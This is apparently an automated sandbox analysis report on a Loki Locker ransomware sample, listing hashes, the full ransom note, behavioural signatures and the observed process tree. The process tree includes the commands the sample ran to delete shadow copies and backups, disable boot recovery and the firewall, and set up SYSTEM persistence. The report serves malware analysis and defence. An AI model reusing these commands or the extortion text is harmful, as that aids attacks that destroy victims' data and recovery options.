Analysis

  • max time kernel
    110s
  • max time network
    141s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64
    arch:x86
    image:win10v2004-20221111-en
    locale:en-us
    os:windows10-2004-x64
    system
  • submitted
    30/01/2023, 19:09

General

  • Target

    13933403b4b5d79da1decbc41867c842e3577bcba8ce3859f7d9b881348ad377.exe

  • Size

    607KB

  • MD5

    9893de16867126eeb989265cd99fd201

  • SHA1

    71e0c3ee67daffada30a0bcd3abafaf59cfa8b5d

  • SHA256

    13933403b4b5d79da1decbc41867c842e3577bcba8ce3859f7d9b881348ad377

  • SHA512

    d7e175b821f3cef659c57b0f46abc35bb11f3dd47c8acdf1aa534c5faa88131e82aa2eebb0e5bfdb16a545356af975daac64a70085eee64196c5e5dfc92995ea

  • SSDEEP

    12288:o6pGFv42oseLA5Gt/arlTT6zncVUJ7vnK6U:o6pEA25WQm/cTT6DNK6U

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\info.hta

Ransom Note
All your files have been encrypted by Loki locker! All your files have been encrypted due to a security problem with your PC. If you want to restore them, please send an email [email protected] You have to pay for decryption in Bitcoin. The price depends on how fast you contact us. After payment we will send you the decryption tool. You have to 48 hours(2 Days) To contact or paying us After that, you have to Pay Double . In case of no answer in 24 hours (1 Day) write to this email [email protected] Your unique ID is : 12419524 You only have LIMITED time to get back your files! If timer runs out and you dont pay us , all of files will be DELETED and you hard disk will be seriously DAMAGED. You will lose some of your data on day 2 in the timer. You can buy more time for pay. Just email us. THIS IS NOT A JOKE! you can wait for the timer to run out ,and watch deletion of your files :) What is our decryption guarantee? Before paying you can send us up to for free decryption. The total size of files must be less than 2Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) Attention! DO NOT pay any money before decrypting the test files. DO NOT trust any intermediary. they wont help you and you may be victim of scam. just email us , we help you in any steps. DO NOT reply to other emails. ONLY this two emails can help you. Do not rename encrypted files. Do not try to decrypt your data using third party software, it may cause permanent data loss. Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Modifies Windows Firewall 1 TTPs 2 IoCs
  • Modifies extensions of user files 2 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Drops desktop.ini file(s) 28 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies Control Panel 2 IoCs
  • Modifies registry class 8 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 47 IoCs
  • Suspicious use of WriteProcessMemory 60 IoCs
  • System policy modification 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\13933403b4b5d79da1decbc41867c842e3577bcba8ce3859f7d9b881348ad377.exe
    "C:\Users\Admin\AppData\Local\Temp\13933403b4b5d79da1decbc41867c842e3577bcba8ce3859f7d9b881348ad377.exe"
    1⤵
    • Modifies Windows Defender Real-time Protection settings
    • Modifies extensions of user files
    • Checks computer location settings
    • Drops startup file
    • Adds Run key to start application
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:1948
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /CREATE /SC ONLOGON /TN Loki /TR C:\Users\Admin\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4912
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /SC ONLOGON /TN Loki /TR C:\Users\Admin\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F
        3⤵
        • Creates scheduled task(s)
        PID:5056
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3gkghddf\3gkghddf.cmdline"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:5028
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7081.tmp" "c:\ProgramData\CSCB2BCC30F2BF34A0DBC9133264BB9413.TMP"
        3⤵
        PID:4788
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet
      2⤵
      PID:1008
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C wbadmin DELETE SYSTEMSTATEBACKUP
      2⤵
      PID:3488
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3492
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic shadowcopy delete
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3892
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
      2⤵
      PID:5044
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
      2⤵
      PID:780
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
      2⤵
      PID:1244
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C netsh firewall set opmode mode=disable
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4644
      • C:\Windows\SysWOW64\netsh.exe
        netsh firewall set opmode mode=disable
        3⤵
        • Modifies Windows Firewall
        PID:2500
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C netsh advfirewall set currentprofile state off
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2788
      • C:\Windows\SysWOW64\netsh.exe
        netsh advfirewall set currentprofile state off
        3⤵
        • Modifies Windows Firewall
        PID:756
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      2⤵
      PID:5684
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      2⤵
      PID:5724
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      2⤵
      PID:5748
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      2⤵
      PID:5772
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      2⤵
      PID:5800
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:820

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\ProgramData\0yumhtof.exe

    Filesize

    28KB

    MD5

    17b7f783899bc27df296ad78aff09068

    SHA1

    a3f2c839008d5304c2d674f056560d6850500a60

    SHA256

    a619578c951f53f10e32037d4de60e9790cf1fdaea2d3c684721bdd5a26995cf

    SHA512

    62a13e7ff1e104b8e68996145a62ddb0cce381a9408d0d2d5eda47f2a37ab42b27fe63c44fd5983e9ab1ca44d866cac0e097ea7fc1f6bf9e8b800f87f8f0617e

  • C:\Users\Admin\AppData\Local\Temp\RES7081.tmp

    Filesize

    25KB

    MD5

    3cf13e8ab582638570548e8592fa72ea

    SHA1

    b6ebdf722bbacd49781b868976d8f884fac2850f

    SHA256

    78271886d3605fa1ea0d6bd408f580b6f3f53881149037fabf2e0e2e673d2eea

    SHA512

    e903a530c8b8f26b16e142530fae82f3e800d5885e3e2b05b9965278aa46f313d63471bd9a11bc8373a8db7a2c84feed30cad6bb1f72fba418bb3d8e18d7f302

  • C:\Users\Admin\AppData\Local\Temp\info.hta

    Filesize

    6KB

    MD5

    b41a7e28d9054f4bf2856ea7309cbac8

    SHA1

    278ba5b78aef0ab6f467cb8a9f866aa5a2d7b292

    SHA256

    55834885eeca57f97e1735f2ab5ef13113969c702d500dd13b58e1a6797b658d

    SHA512

    b33385fd17b943549da9a16a2007006278cf163de66052d8d49b1a410b0364949bbc6ead178ce70423a215af1519d2e5d257b8510d3bedf466b89dd3b8ce59cf

  • \??\c:\ProgramData\CSCB2BCC30F2BF34A0DBC9133264BB9413.TMP

    Filesize

    24KB

    MD5

    0fbee6e443f32ddf847996f968373b9c

    SHA1

    a143c9c57638dc8612c32aeddb4dda9798d10f7e

    SHA256

    3c2f0eee5178d09a99b5104f6a61da8faae3d26352a4d91e348a8673a870a229

    SHA512

    ebacaa33113aca90ff826e5496bec6cc20506cfcc3e56fe536c9542a1a1e05644253ee3d46b1d090ad7980abafee5457949c9b4da2ec235b7e240753d109f560

  • \??\c:\Users\Admin\AppData\Local\Temp\3gkghddf\3gkghddf.0.cs

    Filesize

    1KB

    MD5

    4d77ac566b029d45c02c8b718796ccc1

    SHA1

    0732326dcf9c36a465e46c6a3fa38c5841a14ada

    SHA256

    c4535df4d7124805bd5cc74de8b9f943dcc94651ed60e17fa21a273796892093

    SHA512

    1c300565851bc75adcd6fc43f5ac269e9d124537b25fd8130303fb7b883d2351ff92b778a7e20efffd974beef43b658d4c07002fe1a1cae00dffde7fc3f0fd8d

  • \??\c:\Users\Admin\AppData\Local\Temp\3gkghddf\3gkghddf.cmdline

    Filesize

    236B

    MD5

    3931842991c8b9a0eb1bbb6031dbd10b

    SHA1

    1da8c4f89bf8db685189d6d63f26bac6ea99de6a

    SHA256

    d49fa0a64ca9bc01f84e22b3309b887cc1055d986c754b70c29e96ccd36fee73

    SHA512

    fe872de7a1e956d85ef0775a29b602fed11813ddb651cbcdd86f621e981ae971167f2917ccfd0b83adb1ad195a1c49def8450b48468a2fdced107def8b122de4

  • \??\c:\Users\Admin\AppData\Local\Temp\w4ptlyzl.ico

    Filesize

    23KB

    MD5

    8c9a5448905c6ad6f5a15ad8f102fa56

    SHA1

    185575a9708fe9ff122423e459eeed7098ad11d4

    SHA256

    fc65491d373c30593f9ef53d83959625dc384bc42d551aa77a666d4e9b538104

    SHA512

    2032d1f19ac0734339626531cd77ce0509dbba93260c87505d20998ab66aa3dceee4c94e10d8620cdcc62eacf9e63bbe5357afa2a09abdaa51ca0fde8b9aed50

  • memory/1948-134-0x00000000057B0000-0x0000000005816000-memory.dmp

    Filesize

    408KB

  • memory/1948-135-0x0000000005820000-0x0000000005896000-memory.dmp

    Filesize

    472KB

  • memory/1948-133-0x0000000005610000-0x00000000056A2000-memory.dmp

    Filesize

    584KB

  • memory/1948-136-0x0000000005570000-0x0000000005592000-memory.dmp

    Filesize

    136KB

  • memory/1948-132-0x0000000000CF0000-0x0000000000D8A000-memory.dmp

    Filesize

    616KB